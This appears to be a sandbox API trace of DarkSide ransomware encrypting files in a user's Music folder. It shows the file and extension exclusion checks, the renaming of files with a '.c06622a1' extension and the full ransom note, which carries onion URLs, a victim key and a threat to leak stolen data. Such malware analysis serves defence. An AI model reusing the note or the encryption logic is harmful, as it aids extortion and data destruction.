(_String="appdata") returned 0x7 [0151.119] _wcsicmp (_Str1="application data", _Str2="z3-tnC") returned -25 [0151.119] wcslen (_String="application data") returned 0x10 [0151.119] _wcsicmp (_Str1="boot", _Str2="z3-tnC") returned -24 [0151.119] wcslen (_String="boot") returned 0x4 [0151.119] _wcsicmp (_Str1="google", _Str2="z3-tnC") returned -19 [0151.119] wcslen (_String="google") returned 0x6 [0151.120] _wcsicmp (_Str1="mozilla", _Str2="z3-tnC") returned -13 [0151.120] wcslen (_String="mozilla") returned 0x7 [0151.120] _wcsicmp (_Str1="program files", _Str2="z3-tnC") returned -10 [0151.120] wcslen (_String="program files") returned 0xd [0151.120] _wcsicmp (_Str1="program files (x86)", _Str2="z3-tnC") returned -10 [0151.120] wcslen (_String="program files (x86)") returned 0x13 [0151.120] _wcsicmp (_Str1="programdata", _Str2="z3-tnC") returned -10 [0151.120] wcslen (_String="programdata") returned 0xb [0151.120] _wcsicmp (_Str1="system volume information", _Str2="z3-tnC") returned -7 [0151.120] wcslen (_String="system volume information") returned 0x19 [0151.120] _wcsicmp (_Str1="tor browser", _Str2="z3-tnC") returned -6 [0151.120] wcslen (_String="tor browser") returned 0xb [0151.120] _wcsicmp (_Str1="windows.old", _Str2="z3-tnC") returned -3 [0151.120] wcslen (_String="windows.old") returned 0xb [0151.120] _wcsicmp (_Str1="intel", _Str2="z3-tnC") returned -17 [0151.120] wcslen (_String="intel") returned 0x5 [0151.120] _wcsicmp (_Str1="msocache", _Str2="z3-tnC") returned -13 [0151.120] wcslen (_String="msocache") returned 0x8 [0151.120] _wcsicmp (_Str1="perflogs", _Str2="z3-tnC") returned -10 [0151.120] wcslen (_String="perflogs") returned 0x8 [0151.120] _wcsicmp (_Str1="x64dbg", _Str2="z3-tnC") returned -2 [0151.120] wcslen (_String="x64dbg") returned 0x6 [0151.120] _wcsicmp (_Str1="public", _Str2="z3-tnC") returned -10 [0151.120] wcslen (_String="public") returned 0x6 [0151.120] _wcsicmp (_Str1="all users", _Str2="z3-tnC") returned -25 [0151.120] wcslen (_String="all users") returned 0x9 [0151.120] _wcsicmp (_Str1="default", _Str2="z3-tnC") returned -22 [0151.120] wcslen (_String="default") returned 0x7 [0151.120] wcscpy (in: _Dest=0x44b0068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*" [0151.120] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*") returned 0x29 [0151.120] wcscpy (in: _Dest=0x44b00b8, _Source="z3-tnC" | out: _Dest="z3-tnC") returned="z3-tnC" [0151.120] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0151.120] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0151.121] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC" [0151.121] GetNamedSecurityInfoW () returned 0x0 [0151.121] SetEntriesInAclW () returned 0x0 [0151.121] SetNamedSecurityInfoW () returned 0x0 [0151.125] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d58198) returned 1 [0151.125] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fe83c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0151.125] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z3-tnc")) returned 1 [0151.126] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0151.126] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z3-tnc\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x678 [0151.126] WriteFile (in: hFile=0x678, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fe80c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fe80c*=0xa8f, lpOverlapped=0x0) returned 1 [0151.127] CloseHandle (hObject=0x678) returned 1 [0151.127] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0151.127] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z3-tnc")) returned 0x10 [0151.127] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\") returned="" [0151.127] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\") returned 0x2f [0151.127] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\*", fInfoLevelId=0x0, lpFindFileData=0x3fea6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fea6c) returned 0x2db8780 [0151.127] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92206b50, ftCreationTime.dwHighDateTime=0x1d5ddcd, ftLastAccessTime.dwLowDateTime=0xd8b12e80, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd8b12e80, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0151.128] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b1ed800, ftCreationTime.dwHighDateTime=0x1d5e489, ftLastAccessTime.dwLowDateTime=0x7bff4140, ftLastAccessTime.dwHighDateTime=0x1d5dc09, ftLastWriteTime.dwLowDateTime=0x7bff4140, ftLastWriteTime.dwHighDateTime=0x1d5dc09, nFileSizeHigh=0x0, nFileSizeLow=0x45a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="-Z8dtk8VWDU.wav", cAlternateFileName="-Z8DTK~1.WAV")) returned 1 [0151.128] _wcsicmp (_Str1="-Z8dtk8VWDU.wav", _Str2="README.c06622a1.TXT") returned -69 [0151.128] wcsstr (_Str="-Z8dtk8VWDU.wav", _SubStr="README") returned 0x0 [0151.128] _wcsicmp (_Str1="autorun.inf", _Str2="-Z8dtk8VWDU.wav") returned 52 [0151.128] wcslen (_String="autorun.inf") returned 0xb [0151.128] _wcsicmp (_Str1="boot.ini", _Str2="-Z8dtk8VWDU.wav") returned 53 [0151.128] wcslen (_String="boot.ini") returned 0x8 [0151.128] _wcsicmp (_Str1="bootfont.bin", _Str2="-Z8dtk8VWDU.wav") returned 53 [0151.128] wcslen (_String="bootfont.bin") returned 0xc [0151.128] _wcsicmp (_Str1="bootsect.bak", _Str2="-Z8dtk8VWDU.wav") returned 53 [0151.128] wcslen (_String="bootsect.bak") returned 0xc [0151.128] _wcsicmp (_Str1="desktop.ini", _Str2="-Z8dtk8VWDU.wav") returned 55 [0151.128] wcslen (_String="desktop.ini") returned 0xb [0151.128] _wcsicmp (_Str1="iconcache.db", _Str2="-Z8dtk8VWDU.wav") returned 60 [0151.128] wcslen (_String="iconcache.db") returned 0xc [0151.128] _wcsicmp (_Str1="ntldr", _Str2="-Z8dtk8VWDU.wav") returned 65 [0151.128] wcslen (_String="ntldr") returned 0x5 [0151.128] _wcsicmp (_Str1="ntuser.dat", _Str2="-Z8dtk8VWDU.wav") returned 65 [0151.128] wcslen (_String="ntuser.dat") returned 0xa [0151.128] _wcsicmp (_Str1="ntuser.dat.log", _Str2="-Z8dtk8VWDU.wav") returned 65 [0151.128] wcslen (_String="ntuser.dat.log") returned 0xe [0151.129] _wcsicmp (_Str1="ntuser.ini", _Str2="-Z8dtk8VWDU.wav") returned 65 [0151.129] wcslen (_String="ntuser.ini") returned 0xa [0151.129] _wcsicmp (_Str1="thumbs.db", _Str2="-Z8dtk8VWDU.wav") returned 71 [0151.129] wcslen (_String="thumbs.db") returned 0x9 [0151.129] _wcsicmp (_Str1="386", _Str2="wav") returned -68 [0151.129] wcslen (_String="386") returned 0x3 [0151.129] _wcsicmp (_Str1="adv", _Str2="wav") returned -22 [0151.129] wcslen (_String="adv") returned 0x3 [0151.129] _wcsicmp (_Str1="ani", _Str2="wav") returned -22 [0151.129] wcslen (_String="ani") returned 0x3 [0151.129] _wcsicmp (_Str1="bat", _Str2="wav") returned -21 [0151.129] wcslen (_String="bat") returned 0x3 [0151.129] _wcsicmp (_Str1="bin", _Str2="wav") returned -21 [0151.129] wcslen (_String="bin") returned 0x3 [0151.129] _wcsicmp (_Str1="cab", _Str2="wav") returned -20 [0151.129] wcslen (_String="cab") returned 0x3 [0151.129] _wcsicmp (_Str1="cmd", _Str2="wav") returned -20 [0151.129] wcslen (_String="cmd") returned 0x3 [0151.129] _wcsicmp (_Str1="com", _Str2="wav") returned -20 [0151.129] wcslen (_String="com") returned 0x3 [0151.129] _wcsicmp (_Str1="cpl", _Str2="wav") returned -20 [0151.129] wcslen (_String="cpl") returned 0x3 [0151.129] _wcsicmp (_Str1="cur", _Str2="wav") returned -20 [0151.129] wcslen (_String="cur") returned 0x3 [0151.129] _wcsicmp (_Str1="deskthemepack", _Str2="wav") returned -19 [0151.129] wcslen (_String="deskthemepack") returned 0xd [0151.129] _wcsicmp (_Str1="diagcab", _Str2="wav") returned -19 [0151.129] wcslen (_String="diagcab") returned 0x7 [0151.129] _wcsicmp (_Str1="diagcfg", _Str2="wav") returned -19 [0151.129] wcslen (_String="diagcfg") returned 0x7 [0151.129] _wcsicmp (_Str1="diagpkg", _Str2="wav") returned -19 [0151.129] wcslen (_String="diagpkg") returned 0x7 [0151.129] _wcsicmp (_Str1="dll", _Str2="wav") returned -19 [0151.129] wcslen (_String="dll") returned 0x3 [0151.129] _wcsicmp (_Str1="drv", _Str2="wav") returned -19 [0151.129] wcslen (_String="drv") returned 0x3 [0151.129] _wcsicmp (_Str1="exe", _Str2="wav") returned -18 [0151.130] wcslen (_String="exe") returned 0x3 [0151.130] _wcsicmp (_Str1="hlp", _Str2="wav") returned -15 [0151.130] wcslen (_String="hlp") returned 0x3 [0151.130] _wcsicmp (_Str1="icl", _Str2="wav") returned -14 [0151.130] wcslen (_String="icl") returned 0x3 [0151.130] _wcsicmp (_Str1="icns", _Str2="wav") returned -14 [0151.130] wcslen (_String="icns") returned 0x4 [0151.130] _wcsicmp (_Str1="ico", _Str2="wav") returned -14 [0151.130] wcslen (_String="ico") returned 0x3 [0151.130] _wcsicmp (_Str1="ics", _Str2="wav") returned -14 [0151.130] wcslen (_String="ics") returned 0x3 [0151.130] _wcsicmp (_Str1="idx", _Str2="wav") returned -14 [0151.130] wcslen (_String="idx") returned 0x3 [0151.130] _wcsicmp (_Str1="ldf", _Str2="wav") returned -11 [0151.130] wcslen (_String="ldf") returned 0x3 [0151.130] _wcsicmp (_Str1="lnk", _Str2="wav") returned -11 [0151.130] wcslen (_String="lnk") returned 0x3 [0151.130] _wcsicmp (_Str1="mod", _Str2="wav") returned -10 [0151.130] wcslen (_String="mod") returned 0x3 [0151.130] _wcsicmp (_Str1="mpa", _Str2="wav") returned -10 [0151.130] wcslen (_String="mpa") returned 0x3 [0151.130] _wcsicmp (_Str1="msc", _Str2="wav") returned -10 [0151.130] wcslen (_String="msc") returned 0x3 [0151.130] _wcsicmp (_Str1="msp", _Str2="wav") returned -10 [0151.130] wcslen (_String="msp") returned 0x3 [0151.130] _wcsicmp (_Str1="msstyles", _Str2="wav") returned -10 [0151.130] wcslen (_String="msstyles") returned 0x8 [0151.130] _wcsicmp (_Str1="msu", _Str2="wav") returned -10 [0151.130] wcslen (_String="msu") returned 0x3 [0151.130] _wcsicmp (_Str1="nls", _Str2="wav") returned -9 [0151.130] wcslen (_String="nls") returned 0x3 [0151.130] _wcsicmp (_Str1="nomedia", _Str2="wav") returned -9 [0151.130] wcslen (_String="nomedia") returned 0x7 [0151.130] _wcsicmp (_Str1="ocx", _Str2="wav") returned -8 [0151.130] wcslen (_String="ocx") returned 0x3 [0151.130] _wcsicmp (_Str1="prf", _Str2="wav") returned -7 [0151.130] wcslen (_String="prf") returned 0x3 [0151.131] _wcsicmp (_Str1="ps1", _Str2="wav") returned -7 [0151.131] wcslen (_String="ps1") returned 0x3 [0151.131] _wcsicmp (_Str1="rom", _Str2="wav") returned -5 [0151.131] wcslen (_String="rom") returned 0x3 [0151.131] _wcsicmp (_Str1="rtp", _Str2="wav") returned -5 [0151.131] wcslen (_String="rtp") returned 0x3 [0151.131] _wcsicmp (_Str1="scr", _Str2="wav") returned -4 [0151.131] wcslen (_String="scr") returned 0x3 [0151.131] _wcsicmp (_Str1="shs", _Str2="wav") returned -4 [0151.131] wcslen (_String="shs") returned 0x3 [0151.131] _wcsicmp (_Str1="spl", _Str2="wav") returned -4 [0151.131] wcslen (_String="spl") returned 0x3 [0151.131] _wcsicmp (_Str1="sys", _Str2="wav") returned -4 [0151.131] wcslen (_String="sys") returned 0x3 [0151.131] _wcsicmp (_Str1="theme", _Str2="wav") returned -3 [0151.131] wcslen (_String="theme") returned 0x5 [0151.131] _wcsicmp (_Str1="themepack", _Str2="wav") returned -3 [0151.131] wcslen (_String="themepack") returned 0x9 [0151.131] _wcsicmp (_Str1="wpx", _Str2="wav") returned 15 [0151.131] wcslen (_String="wpx") returned 0x3 [0151.131] _wcsicmp (_Str1="lock", _Str2="wav") returned -11 [0151.131] wcslen (_String="lock") returned 0x4 [0151.131] _wcsicmp (_Str1="key", _Str2="wav") returned -12 [0151.131] wcslen (_String="key") returned 0x3 [0151.131] _wcsicmp (_Str1="hta", _Str2="wav") returned -15 [0151.131] wcslen (_String="hta") returned 0x3 [0151.131] _wcsicmp (_Str1="msi", _Str2="wav") returned -10 [0151.131] wcslen (_String="msi") returned 0x3 [0151.131] _wcsicmp (_Str1="pdb", _Str2="wav") returned -7 [0151.131] wcslen (_String="pdb") returned 0x3 [0151.131] _wcsicmp (_Str1="sql", _Str2="wav") returned -4 [0151.131] wcslen (_String="sql") returned 0x3 [0151.131] _wcsicmp (_Str1="sqlite", _Str2="wav") returned -4 [0151.131] wcslen (_String="sqlite") returned 0x6 [0151.131] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z3-tnc")) returned 0x10 [0151.132] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0151.132] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC" [0151.132] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC") returned 0x2e [0151.132] wcscpy (in: _Dest=0x45000ee, _Source="-Z8dtk8VWDU.wav" | out: _Dest="-Z8dtk8VWDU.wav") returned="-Z8dtk8VWDU.wav" [0151.132] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\-Z8dtk8VWDU.wav", dwFileAttributes=0x80) returned 1 [0151.132] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\-Z8dtk8VWDU.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z3-tnc\\-z8dtk8vwdu.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x67c [0151.133] SetFilePointerEx (in: hFile=0x67c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.133] ReadFile (in: hFile=0x67c, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0151.134] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0x2b028353 [0151.134] RtlComputeCrc32 (PartialCrc=0x8353, Buffer=0x3fe8f4, Length=0x80) returned 0x20a74d19 [0151.134] RtlComputeCrc32 (PartialCrc=0x4d19, Buffer=0x3fe8f4, Length=0x80) returned 0x2413303b [0151.134] RtlComputeCrc32 (PartialCrc=0x303b, Buffer=0x3fe8f4, Length=0x80) returned 0xdfe70948 [0151.134] RtlComputeCrc32 (PartialCrc=0x948, Buffer=0x3fe8f4, Length=0x80) returned 0xae9f901e [0151.134] CloseHandle (hObject=0x67c) returned 1 [0151.134] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0151.134] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\-Z8dtk8VWDU.wav" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\-Z8dtk8VWDU.wav") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\-Z8dtk8VWDU.wav" [0151.134] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\-Z8dtk8VWDU.wav") returned 0x3e [0151.134] wcscpy (in: _Dest=0x4510114, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0151.134] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\-Z8dtk8VWDU.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z3-tnc\\-z8dtk8vwdu.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\-Z8dtk8VWDU.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z3-tnc\\-z8dtk8vwdu.wav.c06622a1"), dwFlags=0x8) returned 1 [0151.136] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\-Z8dtk8VWDU.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z3-tnc\\-z8dtk8vwdu.wav.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x67c [0151.137] CreateIoCompletionPort (FileHandle=0x67c, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0151.137] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x41f0020 [0151.142] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x292c479d [0151.142] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4d67fdb [0151.142] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x72ec0857 [0151.142] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xf519faa [0151.142] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x28fe3f3d [0151.142] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x415d51f3 [0151.142] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1c964824 [0151.142] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4b06db78 [0151.145] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x41f0094, Length=0x80) returned 0x7add0d0 [0151.145] RtlComputeCrc32 (PartialCrc=0xd0d0, Buffer=0x41f0094, Length=0x80) returned 0x36b2a06e [0151.145] RtlComputeCrc32 (PartialCrc=0xa06e, Buffer=0x41f0094, Length=0x80) returned 0xa42a5dea [0151.145] RtlComputeCrc32 (PartialCrc=0x5dea, Buffer=0x41f0094, Length=0x80) returned 0x375dc546 [0151.145] RtlComputeCrc32 (PartialCrc=0xc546, Buffer=0x41f0094, Length=0x80) returned 0x82719ab8 [0151.145] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x41f0020) returned 1 [0151.145] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0151.145] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0151.145] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9c1110, ftCreationTime.dwHighDateTime=0x1d5e488, ftLastAccessTime.dwLowDateTime=0xf6fcd430, ftLastAccessTime.dwHighDateTime=0x1d5de42, ftLastWriteTime.dwLowDateTime=0xf6fcd430, ftLastWriteTime.dwHighDateTime=0x1d5de42, nFileSizeHigh=0x0, nFileSizeLow=0x3e8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="5Z2NqwTA5 2JZZNSm.m4a", cAlternateFileName="5Z2NQW~1.M4A")) returned 1 [0151.145] _wcsicmp (_Str1="5Z2NqwTA5 2JZZNSm.m4a", _Str2="README.c06622a1.TXT") returned -61 [0151.145] wcsstr (_Str="5Z2NqwTA5 2JZZNSm.m4a", _SubStr="README") returned 0x0 [0151.145] _wcsicmp (_Str1="autorun.inf", _Str2="5Z2NqwTA5 2JZZNSm.m4a") returned 44 [0151.145] wcslen (_String="autorun.inf") returned 0xb [0151.145] _wcsicmp (_Str1="boot.ini", _Str2="5Z2NqwTA5 2JZZNSm.m4a") returned 45 [0151.145] wcslen (_String="boot.ini") returned 0x8 [0151.145] _wcsicmp (_Str1="bootfont.bin", _Str2="5Z2NqwTA5 2JZZNSm.m4a") returned 45 [0151.145] wcslen (_String="bootfont.bin") returned 0xc [0151.145] _wcsicmp (_Str1="bootsect.bak", _Str2="5Z2NqwTA5 2JZZNSm.m4a") returned 45 [0151.146] wcslen (_String="bootsect.bak") returned 0xc [0151.146] _wcsicmp (_Str1="desktop.ini", _Str2="5Z2NqwTA5 2JZZNSm.m4a") returned 47 [0151.146] wcslen (_String="desktop.ini") returned 0xb [0151.146] _wcsicmp (_Str1="iconcache.db", _Str2="5Z2NqwTA5 2JZZNSm.m4a") returned 52 [0151.146] wcslen (_String="iconcache.db") returned 0xc [0151.146] _wcsicmp (_Str1="ntldr", _Str2="5Z2NqwTA5 2JZZNSm.m4a") returned 57 [0151.146] wcslen (_String="ntldr") returned 0x5 [0151.146] _wcsicmp (_Str1="ntuser.dat", _Str2="5Z2NqwTA5 2JZZNSm.m4a") returned 57 [0151.146] wcslen (_String="ntuser.dat") returned 0xa [0151.146] _wcsicmp (_Str1="ntuser.dat.log", _Str2="5Z2NqwTA5 2JZZNSm.m4a") returned 57 [0151.146] wcslen (_String="ntuser.dat.log") returned 0xe [0151.146] _wcsicmp (_Str1="ntuser.ini", _Str2="5Z2NqwTA5 2JZZNSm.m4a") returned 57 [0151.146] wcslen (_String="ntuser.ini") returned 0xa [0151.146] _wcsicmp (_Str1="thumbs.db", _Str2="5Z2NqwTA5 2JZZNSm.m4a") returned 63 [0151.146] wcslen (_String="thumbs.db") returned 0x9 [0151.146] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0151.146] wcslen (_String="386") returned 0x3 [0151.146] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0151.146] wcslen (_String="adv") returned 0x3 [0151.146] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0151.146] wcslen (_String="ani") returned 0x3 [0151.146] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0151.146] wcslen (_String="bat") returned 0x3 [0151.146] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0151.146] wcslen (_String="bin") returned 0x3 [0151.146] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0151.146] wcslen (_String="cab") returned 0x3 [0151.146] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0151.146] wcslen (_String="cmd") returned 0x3 [0151.146] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0151.146] wcslen (_String="com") returned 0x3 [0151.146] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0151.146] wcslen (_String="cpl") returned 0x3 [0151.146] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0151.146] wcslen (_String="cur") returned 0x3 [0151.146] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0151.146] wcslen (_String="deskthemepack") returned 0xd [0151.146] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0151.147] wcslen (_String="diagcab") returned 0x7 [0151.147] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0151.147] wcslen (_String="diagcfg") returned 0x7 [0151.147] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0151.147] wcslen (_String="diagpkg") returned 0x7 [0151.147] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0151.147] wcslen (_String="dll") returned 0x3 [0151.147] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0151.147] wcslen 